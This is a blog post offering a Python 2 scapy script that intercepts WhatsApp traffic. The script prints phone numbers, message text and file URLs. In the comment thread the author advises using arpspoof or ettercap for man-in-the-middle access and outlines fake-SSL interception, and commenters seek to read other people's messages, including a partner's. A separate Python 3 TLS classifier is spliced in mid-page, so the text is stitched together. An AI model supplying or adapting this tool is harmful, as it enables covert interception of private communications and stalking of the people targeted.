WhatsApp is a cross-platform app for phones that is used by thousands of people around the world. I’ve used it a couple of times, but not anymore, not since I learned that it transfers almost everything in plaintext and uses HTTPS only rarely, for changing status and in the registration process (?). I decided to write a sniffer/parser for WhatsApp traffic to preview it in a simple and easy way. You will need to MITM (or do whatever you want) and parse the traffic. (You will need scapy.)
(Multiple vulnerabilities have been reported in WhatsApp recently by sec-consult.)
What does it parse:
- Received and sent messages
- Received and sent files
E.g:
```
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
## qnix@0x80.org ##
#########################

[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg
```
Code:
```python
#!/usr/bin/env python
# Python 2 script (print statements, "string_escape" codec). Requires scapy.
import os
import sys
import scapy.all
import re

# State used to suppress duplicates and to collect what was seen
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():
    print "#########################"
    print "## whatsapp sniff v0.1 ##"
    print "## qnix@0x80.org ##"
    print "#########################\n"

def whatsapp_parse(packet):
    global Previous_Msg
    global Previous_Filename
    global Files
    global Messages
    global Urls
    src = packet.sprintf("%IP.src%")
    dst = packet.sprintf("%IP.dst%")
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    # Escaped string form of the payload; the markers below match that form
    raw = packet.sprintf("%Raw.load%")

    # Target Sending stuff
    if dport == "5222":
        Filename = ""
        toNumber = ""
        Url = ""
        Msg = ""
        try:
            # Keep only the digits, then cut the phone number out of them
            toNumber = re.sub(r"\D", "", raw)
            if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
            else: toNumber = toNumber[5:16]
            try:
                Filename = raw.split("file\\xfc")[1][1:37]
                Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
            except Exception: pass
            try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
            except Exception: pass
        except Exception: pass
        if(len(toNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "To : ", toNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "To : ", toNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)

    # Received Messages
    if sport == "5222":
        Msg = ""
        fromNumber = ""
        Url = ""
        Filename = ""
        try:
            fromNumber = re.sub(r"\D", "", raw)
            if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
            else: fromNumber = fromNumber[5:16]
            try:
                Filename = raw.split("file\\xfc")[1][1:37]
                Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
            except Exception: pass
            try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
            except Exception: pass
        except Exception: pass
        # Same length and duplicate checks as the sending branch above
        if(len(fromNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "From : ", fromNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "From : ", fromNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)

def callback(packet):
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    raw = packet.sprintf("%Raw.load%")
    # sprintf yields '??' when the packet carries no Raw layer
    if raw != '??':
        if dport == "5222" or sport == "5222":
            whatsapp_parse(packet)

def main():
    banner()
    if(len(sys.argv) != 2):
        print "%s <interface>" % sys.argv[0]
        sys.exit(1)
    # Settings live on scapy's conf object, not on the scapy package itself
    scapy.all.conf.iface = sys.argv[1]
    scapy.all.conf.verb = 0
    scapy.all.conf.sniff_promisc = 0
    expr = "tcp port 5222"
    print "[+] Interface : ", scapy.all.conf.iface
    print "[+] filter : ", expr
    scapy.all.sniff(filter=expr, prn=callback, store=0)
    print "[+] iface %s" % scapy.all.conf.iface

if __name__ == "__main__":
    main()
```
Enjoy
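Whether an app's traffic on a port such as 5222 is readable or wrapped in TLS can be checked by classifying the first payload bytes of each flow. The block below is an added Python 3 example, not part of the original script; the function names, the 0.6 threshold and the sample payloads are constructed for illustration.

```python
import struct

# TLS record content types and the largest ciphertext record TLS 1.2 allows.
TLS_CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert",
                     22: "handshake", 23: "application_data"}
MAX_RECORD_LEN = 2**14 + 2048

def parse_tls_record_header(payload):
    """Return (type_name, (major, minor), length) for a plausible TLS record, else None."""
    if len(payload) < 5:
        return None
    ctype, major, minor, length = struct.unpack("!BBBH", payload[:5])
    if ctype not in TLS_CONTENT_TYPES:
        return None
    if major != 3 or minor > 4:  # record versions from SSL 3.0 up to TLS 1.3
        return None
    if length > MAX_RECORD_LEN:
        return None
    return TLS_CONTENT_TYPES[ctype], (major, minor), length

def printable_ratio(payload):
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not payload:
        return 0.0
    printable = sum(1 for b in payload if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(payload)

def classify_payload(payload, threshold=0.6):
    """Label one TCP payload as 'empty', 'tls', 'cleartext' or 'binary-unknown'."""
    if not payload:
        return "empty"
    if parse_tls_record_header(payload) is not None:
        return "tls"
    if printable_ratio(payload) >= threshold:
        return "cleartext"
    return "binary-unknown"

def cleartext_flows(flows):
    """Given (label, first_payload) pairs, return the labels that exposed readable data."""
    return [label for label, payload in flows if classify_payload(payload) == "cleartext"]

# Constructed samples (not captured traffic).
SAMPLE_TLS_HELLO = bytes.fromhex("16030100c8010000c40303") + bytes(32)
SAMPLE_CLEARTEXT = b"\xf8\x02\x16\xfc\x04Hello, I will send you a file."
SAMPLE_OPAQUE = bytes(range(128, 192))

if __name__ == "__main__":
    flows = [("tls", SAMPLE_TLS_HELLO), ("plain", SAMPLE_CLEARTEXT), ("opaque", SAMPLE_OPAQUE)]
    for label, payload in flows:
        print(label, classify_payload(payload))
```

A "binary-unknown" result is not proof of encryption; compressed or custom binary framing lands there too, so those flows still need a closer look.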

as always you are amazing
Brilliant :) I’m playing with this right now but parsing everything in Wireshark… any chance you could do this as a Windows or Android app? Just reply here, will be checking! :P
This does work on Windows, just get Python and scapy-win (http://www.secdev.org/projects/scapy/doc/installation.html#windows). As for porting this code to Android (Java), it will be fun, but it isn’t worth the time. Anyway, you can run this code on Android with no problems: get Python, get scapy for Android, get arpspoof. Enjoy
I tried your code, but it doesn’t seem to work. The packets are flowing through but it seems like WhatsApp doesn’t use port 5222 anymore. Could it be that they changed port numbers?
I tried your script on mac os x and got that message: “WARNING: fileno: pcapy API does not permit to get capure file descriptor. Bugs ahead! Press Enter to trigger packet reading”. Do you have any idea how to solve this issue?
I haven’t checked; they might have changed it. If they did, then just change the port number at these lines: 108, 97, 64 and 33.
This is only a warning just ignore it and things should work.
I can’t get it to work on my Mac, does anyone have like a “step by step” instruction on how to get it to work? Thank you very much.
Hey, can you pls give me the APK dates for whatsapp sniffer on phone? Because Google removed it from the store :/ thank you
I’m sorry ainoyin, I don’t have a Mac around to create a step by step. Google will solve any problem you face.
I don’t have the apks
@ainoyin: got the same problem. Did you manage to find a step-by-step tutorial for Mac? Tried Google, but couldn’t find the right info. Thanks.
Hi!! I’m trying your code but I cannot run it, I mean, I run it but I only see in my terminal:
WARNING: No route found for IPv6 destination :: (no default route?)
#########################
## whatsapp sniff v0.1 ##
## qnix@0x80.org ##
#########################
wlan0
[+] Interface : wlan0
[+] filter : tcp port 5222
And I’m sending and receiving messages from my phone and my girlfriend’s one. Do I need Wireshark or should I see the results in the terminal?
Thanks!!
PS: I’ve installed scapy ;)
I think it could be the port number, because it never calls “whatsapp_parse”. Any ideas?
You need to perform a MITM attack on the phone/router/all; use arpspoof or ettercap or write your own. Some people reported that newer versions of WhatsApp don’t use plaintext communication anymore, which means the script will not capture any plaintext data even if it was changed or fixed according to the new method they use. You might be able to find another vulnerability to sniff. E.g. if WhatsApp’s client doesn’t check the authenticity of the SSL certificate, which means you can perform a MITM attack with fake SSL and get the original. It will look something like this:
Original :
[Phone-ssl]<->[Whatsapp-ssl]
Spying :
[Phone-fakessl]<->[You-ssl]<->[whatsapp-ssl]
That can only happen if the client doesn’t really check the original SSL certificate (maybe hardcoded) into the client.
Hi,
Thanks for posting this. I am running the python script on linux. I run as:
# sudo python2.7 WhatAppPythonSniffer0.1.py wlan0
The process runs (till I do a ctrl^c), I get the following output:
WARNING: No route found for IPv6 destination :: (no default route?):
###################
## whatsapp sniff v0.1 ##
###################
[+] Interface: wlan0
[+] filter : tcp port 5223
However, I am not really sure what argument to pass to the program, whether eth0 or wlan0. I am running from a laptop connected wireless to my router.
The second thing I need to know is: can anyone point out to me what needs to be done in parallel to running the script? I read about a MITM attack, but is there a detailed way on how to do so?
I have changed the port from 5222 to 5223 as a previous thread suggested, but nothing changed.
Thanks a lot for your advice.
Check out
http://arpspoof.sourceforge.net/
http://ettercap.sourceforge.net/
Keep in mind that the vulnerability is most probably patched in newer versions since they support SSL now. Please read the previous comment.
I get the following error:
No module named pcapy
Why?
Hi All,
I also can’t get it to work on my Mac, but I think I am close (am new to Python, I must say).
simon$ python sniffer.py wlan0
Traceback (most recent call last):
File "sniffer.py", line 5, in
import scapy.all
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/all.py", line 13, in
from arch import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/__init__.py", line 71, in
from bsd import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/bsd.py", line 10, in
from unix import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/unix.py", line 17, in
from pcapdnet import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 26, in
import pcapy as pcap
ImportError: No module named pcapy
can somebody tell me how to get scapy.all imported?
Both of you should install scapy
google scapy
Is there any way to do this now with WhatsApp?
How can I capture WhatsApp data on my other phone?
By the unbelievable stupidity of the questions these people are asking around here as technical feedback ( i.e. : asking -but I wanted it to work magically, what is this arpspoofing thing?) , becomes quite obvious that you attracted a horde of idiots with this script, and idiots, contrary to popular belief, are people desperate for power and to harm others with it. Don’t tell me this is for educational purposes, someone who asks the questions you’re being asked here is up for no real education.
I personally don’t think these people should be encouraged. Do you?
Saluting from Argentina :)
Hey. My question is a little off topic, but is there any way to change the port WhatsApp uses or tunnel it some way on iPhone? The hotspot I mostly use blocks communications through all ports other than 8080 and I was looking for a way around it since I use WhatsApp a lot!
Thanks
^not strictly on the iPhone actually. Android too.
Hey mate, this code and link is all about sniffing WhatsApp, right?
I’m not as expert as you all are, but I need advice. I have installed Python on my Windows 7 machine. I have Python DOS too. What to do next? Do I simply start typing this code given or what?
help me :)
Open a cmd window and type: python wlan0
and that’s it :D
I think whatsapp changed the ports!
I don’t get nothing on 5222!
Any ideas?
I wanted to make this work, SO badly! Like… really, sniffing this WhatsApp is a life definition thing. But I have absolutely NO IDEA what this is all about, I’m a Designer for Christ’s sake… I swear I tried to understand, I opened like 98573489 tutorials and read everything on Wikipedia, I even downloaded Wireshark and Python and scapy, but I don’t understand the essence of using the code, and how it interacts with this software… the farthest I’ve gone with codes is opening websites’ sources to “steal” good quality editable images… lol. Anyways, really hope I can find someone tr00 to help me, my time is running out :(
I am sniffing WhatsApp traffic but it’s all SSL at the moment. So I am about to set up a MITM but need a keyword for Google to continue. What software to use for a MITM when I already have all traffic flowing through my PC?
Hi brother, I know WhatsApp is encrypted now. Do you have any idea? Would you please release a 0.2v WhatsApp sniffer to help us? Thank you.
Paul
I actually wish to bookmark this particular article, “Sniffing Whatsapp0x80 | 0x80” http://stumbleread.com on my personal internet site.
Will you care in the event that I do? Regards, Ingeborg
I don’t mind
Thanks for your personal marvelous posting! I really enjoyed reading
it, you’re a great author. I will always bookmark your blog and will eventually come back later in life. I want to encourage one to continue your great posts, have a nice morning!